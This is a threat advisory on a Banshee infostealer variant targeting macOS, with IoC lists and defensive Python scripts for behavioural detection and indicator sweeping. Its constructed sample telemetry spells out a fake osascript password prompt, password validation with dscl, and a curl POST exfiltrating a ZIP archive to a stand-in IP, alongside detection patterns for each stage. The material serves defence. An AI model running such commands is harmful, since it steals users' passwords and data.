macOS Users Targeted by the New Variant of Banshee Infostealer


Threat Group: Unknown
Threat Type: Information Stealer (Infostealer)
Exploited Vulnerabilities: No specific vulnerabilities exploited; relies on social engineering and phishing tactics
Malware Used: Banshee Stealer
Threat Score: High (8.5/10) – Due to its advanced evasion techniques, targeting of macOS systems, and comprehensive data theft capabilities.
Last Threat Observation: January 9, 2025


Overview

Banshee Stealer, a macOS-focused malware, has resurfaced with enhanced capabilities aimed at evading detection. Initially discovered in mid-2024 and offered as a malware-as-a-service (MaaS) for $3,000 per month, Banshee Stealer is designed to harvest sensitive information from compromised macOS systems. In late 2024 its source code was leaked, leading to a temporary shutdown of the operation. However, reports from January 2025 describe new variants whose string encryption is borrowed from Apple's XProtect antivirus engine, which allowed them to pass static, signature-based scanning.

Key Details

  • Delivery Method: Primarily distributed through phishing websites and fake GitHub repositories impersonating popular software such as Google Chrome, Telegram, and TradingView.
  • Target: macOS users, with a focus on extracting data from web browsers, cryptocurrency wallets, and system files.
  • Functions:
    • Harvests browser credentials, cookies, history, and autofill data from browsers including Chrome, Firefox, Brave, and Edge.
    • Extracts information from cryptocurrency wallets such as Exodus, Electrum, Coinomi, and Ledger.
    • Collects system information, including hardware and software details, and the user's public IP address.
    • Employs fake macOS password prompts to deceive users into providing their system passwords.
    • Compresses and encrypts collected data before exfiltration to remote servers.
  • Obfuscation: The latest variant encrypts its strings with the same algorithm Apple's XProtect uses to protect its own YARA rules. The plaintext indicators that earlier signatures keyed on are therefore absent from the binary on disk, and string-based antivirus detection does not fire. This does not disguise the malware as a system process; it only defeats static string matching, so behavioural detection remains effective.

Attack Vectors

Banshee Stealer is disseminated through deceptive methods, including:

  • Phishing Websites: Malicious sites masquerading as legitimate download pages for popular software applications.
  • Fake GitHub Repositories: Repositories that impersonate well-known software projects, tricking users into downloading and executing the malware.

Once executed, the malware performs the following actions:

  1. System Reconnaissance: Gathers detailed system information using commands like system_profiler SPSoftwareDataType SPHardwareDataType and retrieves the public IP address via external services.
  2. Credential Harvesting: Presents a fake system password prompt using AppleScript (an osascript "display dialog ... with hidden answer" box styled as a macOS request). The captured password is checked against the local directory service (dscl . -authonly) so that only a valid password is stored for later use, for example to unlock the Keychain.
  3. Data Collection: Accesses and collects data from various browsers, cryptocurrency wallets, and specific file types located in common directories.
  4. Data Exfiltration: Compresses the collected data into a ZIP archive, encrypts it, and transmits it to a command-and-control server using HTTP POST requests.
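The four stages above are visible as ordinary process executions, which is what XProtect's string encryption cannot hide. The following is an added example of correlating those stages per process tree; it is not code from the advisory or from any vendor product. The event schema (ts, pid, ppid, cmdline), the process names, the alert threshold and the telemetry lines are assumptions and constructed samples, to be mapped onto your own EDR's process-execution feed.

```python
"""Behavioural detection for the Banshee-style execution chain described above.
Added example, not code from the advisory. Event schema and thresholds are
assumptions; the sample telemetry below is constructed, not a real capture."""
import re
from dataclasses import dataclass, field

# Stage -> regex over the command line. Each pattern encodes one behaviour the
# advisory attributes to Banshee: system_profiler recon, the AppleScript
# password prompt, local password validation, ZIP staging and an HTTP POST.
STAGE_RULES = [
    ("recon_system_profiler",
     re.compile(r"\bsystem_profiler\b.*SPSoftwareDataType.*SPHardwareDataType")),
    ("fake_password_prompt",
     re.compile(r"\bosascript\b.*display dialog.*hidden answer", re.S)),
    ("password_validation",  # dscl . -authonly is how a script checks a local password
     re.compile(r"\bdscl\b.*\.\s+-?authonly\b")),
    ("staging_zip",
     re.compile(r"\bzip\b.*\s/(?:tmp|private/tmp|var/folders)/\S+\.zip")),
    ("exfil_http_post",
     re.compile(r"\bcurl\b.*(?:-X\s*POST|--data-binary|-F\s|-d\s)")),
]


@dataclass
class Finding:
    root_pid: int
    root_cmdline: str
    stages: dict = field(default_factory=dict)  # stage -> first matching cmdline


def classify(cmdline):
    """Return the stage names whose pattern matches this command line."""
    return [name for name, rx in STAGE_RULES if rx.search(cmdline)]


def root_of(pid, by_pid):
    """Walk ppid links to the top-most process we hold telemetry for; that
    ancestor (e.g. the trojanised app bundle) is what ties the stages together."""
    seen = set()
    while pid in by_pid and by_pid[pid]["ppid"] in by_pid and pid not in seen:
        seen.add(pid)
        pid = by_pid[pid]["ppid"]
    return pid


def detect(events, min_stages=3):
    """Correlate stage hits per process tree. Alert when at least min_stages
    distinct stages occur under one root and one of them is the password
    prompt or the POST. The threshold is an assumption; tune it to your estate
    (an admin inventory script legitimately runs system_profiler and curl)."""
    by_pid = {e["pid"]: e for e in events}
    findings = {}
    for e in sorted(events, key=lambda ev: ev["ts"]):
        stages = classify(e["cmdline"])
        if not stages:
            continue
        root = root_of(e["pid"], by_pid)
        f = findings.setdefault(root, Finding(root, by_pid.get(root, e)["cmdline"]))
        for s in stages:
            f.stages.setdefault(s, e["cmdline"])
    return [f for f in findings.values()
            if len(f.stages) >= min_stages
            and set(f.stages) & {"fake_password_prompt", "exfil_http_post"}]


# Constructed telemetry (not a real capture). PIDs 612-619 model a trojanised
# download; 700-750 model an admin's Terminal session doing an inventory check.
SAMPLE_EVENTS = [
    {"ts": 1, "pid": 612, "ppid": 1, "cmdline": "/Users/alice/Downloads/TradingView.app/Contents/MacOS/TradingView"},
    {"ts": 2, "pid": 613, "ppid": 612, "cmdline": "system_profiler SPSoftwareDataType SPHardwareDataType"},
    {"ts": 3, "pid": 614, "ppid": 612, "cmdline": "osascript -e 'display dialog \"macOS needs your password\" default answer \"\" with hidden answer'"},
    {"ts": 4, "pid": 615, "ppid": 612, "cmdline": "dscl . -authonly alice hunter2"},
    {"ts": 5, "pid": 618, "ppid": 612, "cmdline": "zip -r /tmp/out.zip /tmp/collected"},
    {"ts": 6, "pid": 619, "ppid": 612, "cmdline": "curl -X POST --data-binary @/tmp/out.zip http://198.51.100.7/upload"},
    {"ts": 7, "pid": 700, "ppid": 1, "cmdline": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal"},
    {"ts": 8, "pid": 701, "ppid": 700, "cmdline": "-zsh"},
    {"ts": 9, "pid": 702, "ppid": 701, "cmdline": "system_profiler SPSoftwareDataType SPHardwareDataType"},
    {"ts": 10, "pid": 750, "ppid": 701, "cmdline": "curl -X POST -d '{}' https://api.example.com/inventory"},
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"ALERT root pid {f.root_pid} ({f.root_cmdline}): {sorted(f.stages)}")
```

Run as-is, only the tree rooted at the fake TradingView binary alerts; the Terminal session trips two stages but stays under the threshold. Lowering min_stages to 2 shows the trade-off, since the admin session then alerts too. The osascript rule alone is the highest-value single signal: a hidden-answer dialog spawned by a freshly downloaded, unsigned binary has almost no benign explanation.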

Known Indicators of Compromise (IoCs)

FileHash-SHA256

  • 00c68fb8bcb44581f15cb4f888b4dec8cd6d528cacb287dc1bdeeb34299b8c93
  • 1dcf3b607d2c9e181643dd6bf1fd85e39d3dc4f95b6992e5a435d0d900333416
  • 3bcd41e8da4cf68bb38d9ef97789ec069d393306a5d1ea5846f0c4dc0d5beaab
  • b978c70331fc81804dea11bf0b334aa324d94a2540a285ba266dd5bbfbcbc114
  • cdfbcb3d850713c49d451b3e80fb8507f86ba4ad9385e083c2a2bf8d11adc4fb
  • ce371a92e905d12cb16b5c273429ae91d6ff5485dda04bfedf002d2006856038
  • d04f71711e7749a4ff193843ae9ce852c581e55eaf29b8eec5b36c4b9c8699c2
  • d8ecc92571b3bcd935dcab9cdbeda7c2ebda3021dda013920ace35d294db07be

IPv4

  • 41[.]216[.]183[.]49

Domain

  • alden[.]io
  • api7[.]cfd
  • authorisev[.]site
  • coincapy[.]com
  • contemteny[.]site
  • data[.]country
  • dilemmadu[.]site
  • faulteyotk[.]site
  • forbidstow[.]site
  • fotor[.]software
  • goalyfeastz[.]site
  • opposezmny[.]site
  • oxygen[.]solutions
  • seallysl[.]site
  • servicedny[.]site
  • westar[.]io
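A practical use of the indicators above is a sweep that refangs them, matches hostnames in DNS or proxy logs (including subdomains of the listed domains, but not lookalikes that merely contain them as a substring) and hashes files on disk against the SHA-256 list. The script below is an added example written for this page, not tooling from the advisory; the log line format and the sample lines are constructed and hypothetical.

```python
"""IoC sweep for the Banshee indicators listed above. Added example, not the
advisory's own tooling; the log format and SAMPLE_LOG are constructed."""
import hashlib
import re
import sys
from pathlib import Path

SHA256_IOCS = {
    "00c68fb8bcb44581f15cb4f888b4dec8cd6d528cacb287dc1bdeeb34299b8c93",
    "1dcf3b607d2c9e181643dd6bf1fd85e39d3dc4f95b6992e5a435d0d900333416",
    "3bcd41e8da4cf68bb38d9ef97789ec069d393306a5d1ea5846f0c4dc0d5beaab",
    "b978c70331fc81804dea11bf0b334aa324d94a2540a285ba266dd5bbfbcbc114",
    "cdfbcb3d850713c49d451b3e80fb8507f86ba4ad9385e083c2a2bf8d11adc4fb",
    "ce371a92e905d12cb16b5c273429ae91d6ff5485dda04bfedf002d2006856038",
    "d04f71711e7749a4ff193843ae9ce852c581e55eaf29b8eec5b36c4b9c8699c2",
    "d8ecc92571b3bcd935dcab9cdbeda7c2ebda3021dda013920ace35d294db07be",
}
DEFANGED_DOMAINS = [
    "alden[.]io", "api7[.]cfd", "authorisev[.]site", "coincapy[.]com",
    "contemteny[.]site", "data[.]country", "dilemmadu[.]site", "faulteyotk[.]site",
    "forbidstow[.]site", "fotor[.]software", "goalyfeastz[.]site", "opposezmny[.]site",
    "oxygen[.]solutions", "seallysl[.]site", "servicedny[.]site", "westar[.]io",
]
DEFANGED_IPS = ["41[.]216[.]183[.]49"]


def refang(indicator):
    """Turn the advisory's defanged form (a[.]b) back into a matchable string."""
    return indicator.replace("[.]", ".").lower()


DOMAINS = {refang(d) for d in DEFANGED_DOMAINS}
IPS = {refang(i) for i in DEFANGED_IPS}


def host_matches(host):
    """True for an IoC domain or IP, or any subdomain of an IoC domain.
    Matching is label-wise: cdn.alden.io hits, malden.io does not."""
    host = host.lower().rstrip(".")
    if host in IPS:
        return True
    labels = host.split(".")
    return any(".".join(labels[i:]) in DOMAINS for i in range(len(labels)))


# Hostnames and dotted-quad IPs as they appear in typical DNS / proxy log lines.
HOST_RX = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b|\b\d{1,3}(?:\.\d{1,3}){3}\b", re.I)


def scan_log(lines):
    """Return (line_number, indicator) for every IoC host seen in the lines."""
    hits = []
    for n, line in enumerate(lines, 1):
        for token in HOST_RX.findall(line):
            if host_matches(token):
                hits.append((n, token))
    return hits


def sha256_of_file(path, chunk=1 << 20):
    """Stream the file through SHA-256 so large downloads do not load into RAM."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def sweep_files(root):
    """Hash every regular file under root and return those on the IoC list."""
    matches = []
    for p in Path(root).rglob("*"):
        if p.is_file() and not p.is_symlink():
            try:
                if sha256_of_file(p) in SHA256_IOCS:
                    matches.append(str(p))
            except OSError:
                continue  # unreadable paths are skipped, not fatal
    return matches


# Constructed sample log lines (hypothetical format); line 3 is a lookalike
# that must not match, line 4 is ordinary traffic.
SAMPLE_LOG = [
    "2025-01-09T10:02:11Z dns query client=10.0.0.23 qname=cdn.alden.io type=A",
    "2025-01-09T10:02:12Z proxy 10.0.0.23 POST http://41.216.183.49/upload 200",
    "2025-01-09T10:03:00Z dns query client=10.0.0.41 qname=malden.io type=A",
    "2025-01-09T10:03:05Z dns query client=10.0.0.41 qname=api.github.com type=A",
]

if __name__ == "__main__":
    for n, ioc in scan_log(SAMPLE_LOG):
        print(f"log line {n}: contact with IoC {ioc}")
    if len(sys.argv) > 1:  # e.g. python3 sweep.py ~/Downloads
        for path in sweep_files(sys.argv[1]):
            print(f"IoC hash match: {path}")
```

Hash matching only catches the exact samples listed; a rebuilt binary will hash differently, which is why the domain and IP indicators, and the behavioural chain, matter more over time. Treat the subdomain rule as deliberate: infrastructure reused under a fresh hostname of a listed domain should still trigger.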

Mitigation and Prevention

  • User Awareness: Educate users about the risks of downloading software from unverified sources and the dangers of phishing attacks.
  • Email Filtering: Implement robust email filtering to detect and block phishing attempts that may distribute the malware.
  • Antivirus Protection: Keep endpoint security and XProtect signatures current, and prefer tooling that inspects behaviour (process lineage, AppleScript password dialogs, archive creation followed by HTTP POST), since this variant's string encryption is aimed precisely at static signature matching.
  • Two-Factor Authentication (2FA): Enforce 2FA so that a stolen password alone does not grant account access. Note that Banshee also steals browser cookies, and a replayed session cookie bypasses 2FA, so revoke active sessions for any account used on a suspected-compromised Mac.
  • Monitor Logs: Review DNS, proxy and endpoint logs for the domains and IP listed above, for osascript "display dialog ... with hidden answer" executions launched by unsigned or freshly downloaded binaries, and for system_profiler invocations followed shortly by outbound POST requests.
  • Regular Updates: Banshee exploits no vulnerability, but Apple's detections for it ship as background security and system data file updates; keep automatic installation of those enabled, and keep browsers and wallet software current.

Risk Assessment

The resurgence of Banshee Stealer with enhanced evasion techniques poses a significant threat to macOS users. Its ability to harvest a wide range of sensitive information, coupled with sophisticated methods to avoid detection, elevates the risk profile of this malware. Organizations and individuals using macOS should exercise heightened vigilance and implement comprehensive security measures to defend against potential infections.

Conclusion

Banshee Stealer exemplifies the evolving landscape of macOS-targeted malware, with threat actors continually adapting their tactics to bypass security measures. The incorporation of techniques inspired by legitimate security tools like Apple's XProtect underscores the need for continuous monitoring and updating of security protocols. Organizations are advised to remain alert, educate their users, and employ robust cybersecurity practices to mitigate the risks associated with this and similar threats.


Sources: